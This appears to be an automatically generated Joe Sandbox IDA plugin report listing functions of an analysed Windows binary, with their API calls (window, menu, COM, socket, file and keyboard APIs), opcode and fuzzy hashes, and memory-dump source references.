                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                          • Opcode ID: e2f9a51e446e7b296c3c345ddef72f12cf11c0abf36d870b99b7c3298801a941
                                                                                                                                                                                                                                          • Instruction ID: 28cbf536bf13535c3c06a3c248510ed49695400487ac7a37dde7ad775d98522d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2f9a51e446e7b296c3c345ddef72f12cf11c0abf36d870b99b7c3298801a941
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8711B171600205ABDF157FB0CC85EFE376AAF94314F044076F919AB292DF7199498B70
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00165882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001658C1
                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001658EE
                                                                                                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 001658FD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                          • Opcode ID: dad58f38a7ab95321375a3eac70a6c1ee857ff97b1f49fc273c1acffe2c2d440
                                                                                                                                                                                                                                          • Instruction ID: a7828aa2970163532439ad531e1f911ce0e1420d30d440c29143e9846627a4b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dad58f38a7ab95321375a3eac70a6c1ee857ff97b1f49fc273c1acffe2c2d440
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE016D31600258EFDB219F11DC44BAEBBB5FB45364F108099E889D6251DF709A94DF71
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0012D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0012D3BF
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 0012D3E5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                          • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                          • Opcode ID: 182239bca134ec0ff8cf853e11cb7ea8c4cfdf0725ca4c7bb85f04871d7d1239
                                                                                                                                                                                                                                          • Instruction ID: fe1bc4b8ae637de969e50f87cff375e0c1a0a942ee7ad507b8d74e24e8abb4fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 182239bca134ec0ff8cf853e11cb7ea8c4cfdf0725ca4c7bb85f04871d7d1239
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0AB71801631DBD7355611FC54AFD3310BF01B81F6A8116F842F1104DB60CDA083C2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a6f71cb3a1544c63875ee238d4a7f3a7321d26abf6216deedc273cd25b117a06
                                                                                                                                                                                                                                          • Instruction ID: 515dbfa05720405c021504c8b630bb10cdd2914917057b02b3f688ac6d8c4127
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6f71cb3a1544c63875ee238d4a7f3a7321d26abf6216deedc273cd25b117a06
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFC13975A0021AEFDB15CFA4C8A4EAEB7B5FF48704F218598E505EB251D731EE81CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00103E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                                                                          • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                                                                                                                                          • Instruction ID: fa40d6d6d899274b05a71e5a5509faada3e012e0adae360e0533a5139f83f3e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5A145B2E002869FEB25CF18C8917AEBBE4EF65350F18416DE6D59B2C1C3B49981C751
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1998397398-0
                                                                                                                                                                                                                                          • Opcode ID: e8fe028e81c989074c9c6bfb7e410f9ba4a4de8752ad513cd1a8b05637daca04
                                                                                                                                                                                                                                          • Instruction ID: 473fd65b01a58d934b6fffd46c806a2a9dc8e186e114b3ade9992feb0107e864
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8fe028e81c989074c9c6bfb7e410f9ba4a4de8752ad513cd1a8b05637daca04
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1A15775204700DFC700DF28C485A6AB7E5EF88351F048859FDAA9B362DB70EE05CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00130436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0016FC08,?), ref: 001305F0
                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0016FC08,?), ref: 00130608
                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,0016CC40,000000FF,?,00000000,00000800,00000000,?,0016FC08,?), ref: 0013062D
                                                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 0013064E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 314563124-0
                                                                                                                                                                                                                                          • Opcode ID: 926b97b68ab1df03eeeb07893fa04aafdaf87bac9e86c5dd7d6875fddc60416c
                                                                                                                                                                                                                                          • Instruction ID: 70304cbcf422e4638a2aa780ad5c40242cbcdeaac0d114adff503fdf11b34e83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 926b97b68ab1df03eeeb07893fa04aafdaf87bac9e86c5dd7d6875fddc60416c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD811971A00209EFCB05DF94C994EEEB7F9FF89315F204598E506AB250DB71AE46CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00111391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                          • Opcode ID: 8d1a801bdc663febffd10124db6677de2b9c5366977b98a18c831703bd5eb4db
                                                                                                                                                                                                                                          • Instruction ID: 3f5f4d34a2b49371786c634203a9772bc1ce6dbcbb63ed545009048de8ac6a5f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1a801bdc663febffd10124db6677de2b9c5366977b98a18c831703bd5eb4db
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60417B31600105BBDB2D6BF88C456FEBAA5FF51730F140235F618C39D2E77048C19262
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00166278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001662E2
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00166315
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00166382
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                                                                                                          • Opcode ID: b8a0b726346c2db7bf23e429e3cc01c3cb51ee849c8c898859a1fd09e3644583
                                                                                                                                                                                                                                          • Instruction ID: 82b23530156f68ddf3dc7e6c3231acdb89fe747262e694ce371c91c003f3639a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8a0b726346c2db7bf23e429e3cc01c3cb51ee849c8c898859a1fd09e3644583
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7510A75A00209AFDF10DF68DC809AE7BB5FB55364F10815AF8599B390D770ED91CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00151AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00151AFD
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00151B0B
                                                                                                                                                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00151B8A
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00151B94
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$socket
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1881357543-0
                                                                                                                                                                                                                                          • Opcode ID: c1da1c95bf00c83d03bda7da7be8c394dfaaf17b91f0502b52cc00da78aaf84d
                                                                                                                                                                                                                                          • Instruction ID: 3f3d3380add0f44c2f1d4be2237ee6065a38762ccefe9228cc5edd9aa24a0474
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1da1c95bf00c83d03bda7da7be8c394dfaaf17b91f0502b52cc00da78aaf84d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A841E274600301AFE721AF24C886F6977E5AB44718F548458F96A9F3D3D7B2DD81CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1c73b0f6b516a6bac89dd85c3e0cc265cd0c9e52cdaeb99b68de2208f6be6534
                                                                                                                                                                                                                                          • Instruction ID: 5e70635bcb125a82353bcbc93feec966e66981998aa0e4d81a1708cc140a64a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c73b0f6b516a6bac89dd85c3e0cc265cd0c9e52cdaeb99b68de2208f6be6534
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E411D72904304BFD7259F78CC85BAEBBE9EF98710F10456AF186DB6C2D7B19A418780
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001456D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00145783
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 001457A9
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001457CE
                                                                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001457FA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3321077145-0
                                                                                                                                                                                                                                          • Opcode ID: c0bba2ac226db908963e0003b393363b797f6d6920c604a0a1edee90853f31f0
                                                                                                                                                                                                                                          • Instruction ID: 265f6805021ab712edfe919ac1f8fcc16376873de5acbccff6676bc7ea75a9ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0bba2ac226db908963e0003b393363b797f6d6920c604a0a1edee90853f31f0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52414E39600B11DFCB11DF15C444A5EBBE2EF89720B598499EC4AAB366DB70FD40CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,000F6D71,00000000,00000000,000F82D9,?,000F82D9,?,00000001,000F6D71,8BE85006,00000001,000F82D9,000F82D9), ref: 0010D910
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0010D999
                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0010D9AB
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0010D9B4
                                                                                                                                                                                                                                            • Part of subcall function 00103820: RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                                                                                          • Opcode ID: fa6e2bb0cae9af8cea529d7cd6c4ecf68031f544c27a98973beb3c56ebecc1e0
                                                                                                                                                                                                                                          • Instruction ID: 57ee95159a8ac6e435997938e0f0f1fdc0b823407d1e4c89e2b2a3a3decef3e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa6e2bb0cae9af8cea529d7cd6c4ecf68031f544c27a98973beb3c56ebecc1e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D31AD72A0020AABDB24DFA4EC41EAE7BA5EB41314F054269FC44D6291EB75CD90CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0013AAAC
                                                                                                                                                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0013AAC8
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0013AB36
